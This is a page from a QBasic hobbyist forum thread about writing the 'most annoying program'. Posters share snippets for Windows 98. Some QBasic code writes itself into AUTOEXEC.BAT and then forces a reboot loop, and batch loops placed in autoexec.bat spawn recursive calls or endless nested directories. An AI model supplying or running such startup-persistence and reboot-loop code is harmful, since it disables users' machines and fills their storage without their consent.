Qbasicnews.com

Full Version: New challenge - most annoying program
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13
How about a different approach:

Code:
x

Thats annoying because it wont compile and cannot be run in the interpretter without error. Its even more annoying, because you cant debug or fix it, because you dont know what I had in mind, it could have been a really great game or awesome screensaver but now you will never know. ;-)

BTW, Rel that /is/ annoying, I dont even want to run it, but its annoying to know that you think like that. j/k ;-)

If I could be bother digging out the info on that Intel video card that had a hardware bug that allowed programmers to feed instructions to the card that would cause its cpu to overheat and blowup, that would certainly be annoying, then again I doubt anyone has one of those cards any more.
How about this one:

Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
   PRINT #1, "THISPROGRAM.EXE"
CLOSE #1

DEF SEG = &HFFFF
CALL Absolute(0)

Do not use F8 or advanced starting up options. Works under Win98. (not under later).
I suppose you could always add this to your autoexec.bat file
Code:
:loop
autoexec.bat
goto loop
Does that just keep opening up the autoexec.bat file until all your memory runs out, and your sys crashes?
Not just that, each file you open continues to open more files, kinda like bacteria multiplying. Smile I'm sure Windows Safe Mode would stop it tho.
Try to put this in autoexec.bat:

Code:
:loop
md a
cd a
goto loop
Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
PRINT #1, "THISPROG.EXE"
CLOSE

DEF SEG = 0
POKE &H473, &H12
POKE &H472, &H34
DEF SEG = &HFFFF
CALL Absolute(0)
Oh oh oHHHHH!! I got one, I have an idea for an annoying program!!!!

Code:
DO
PRINT "*annoying mocking voice* Hi I'm wildcard. You can't do this and that. I'm a big jerk face. Waaaaa, I'm complaining about lots of stupid stuff."
LOOP
CLS
DO
I$ = INKEY$
IF I$ <> "" then EXIT DO: PRINT "You pressed <any key>."
LOOP

'Rel, that's dangerous!
ouf , and what may that be?
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13